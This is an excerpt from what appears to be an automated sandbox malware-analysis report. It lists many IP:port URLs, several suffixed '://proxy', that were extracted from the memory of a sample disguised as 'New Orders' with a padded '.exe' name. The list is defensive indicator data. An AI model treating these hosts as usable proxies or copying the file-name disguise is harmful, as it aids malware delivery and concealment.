                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.69.201.117:8082
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.69.201.117:8082://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.75.126.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.75.126.235:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.75.126.235:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A61000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.84.32.118:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.84.32.118:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.126.92.130:33333
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.126.92.130:33333://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.15.28.76:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.15.28.76:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.153.158.19:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.153.158.19:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.92.70.176:3127
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.92.70.176:3127://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.98.4.70:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.98.4.70:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.12.168.114:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.12.168.114:9002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.188.102.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.188.102.225:18080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.188.102.225:18080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.129.2.212:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.129.2.212:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.133.66.69:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.133.66.69:9002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.178.152.31:7302
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.178.152.31:7302://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.216.156.222:60808
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.216.156.222:60808://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.138.243:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.138.243:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.183.101:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.183.101:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.92.189.15
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.92.189.15://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.92.189.15:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.141.70.118
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.141.70.118://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.141.70.118:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:25847
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:25847://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:29497
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:29497://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:41055
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:41055://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:44827
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:44827://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.133.66:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.133.66:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.184.96:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.184.96:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.182.114.164:59623
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.182.114.164:59623://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.198:4673
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.198:4673://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28504000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.220.50:60212
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.220.50:60212://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.53.248:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.53.248:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://63.76.255.180:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://63.76.255.180:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253A7000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.124.145.1:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2514E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.124.145.1:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.182:14287
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.182:14287://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.25:31908
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.25:31908://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A97000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.44.139.12:20037
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.44.139.12:20037://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.90.51.168:55552
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.90.51.168:55552://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.23
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.40.47:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.40.47:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.152.88:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.152.88:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.211.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.211.101:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.211.101:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2979C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.231.142:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.231.142:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.210.33.34:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.210.33.34:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.211.155.34:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.211.155.34:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2539E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.225.246.238:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.225.246.238:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.209:8899
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.209:8899://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:17464
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:17464://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2639E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:44809
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD263AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:44809://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:17464
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:17464://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:29466
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:29466://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14791
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14791://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:24360
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:24360://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.23.233.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.23.233.210:53343
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.23.233.210:53343://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.227:56740
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.227:56740://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.243:10513
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.243:10513://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.244:36427
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.244:36427://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.246:34350
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.246:34350://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.129.53:14464
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.129.53:14464://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26FE1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.131.58:30885
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.131.58:30885://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.103:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.103:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.194:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.194:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:54924
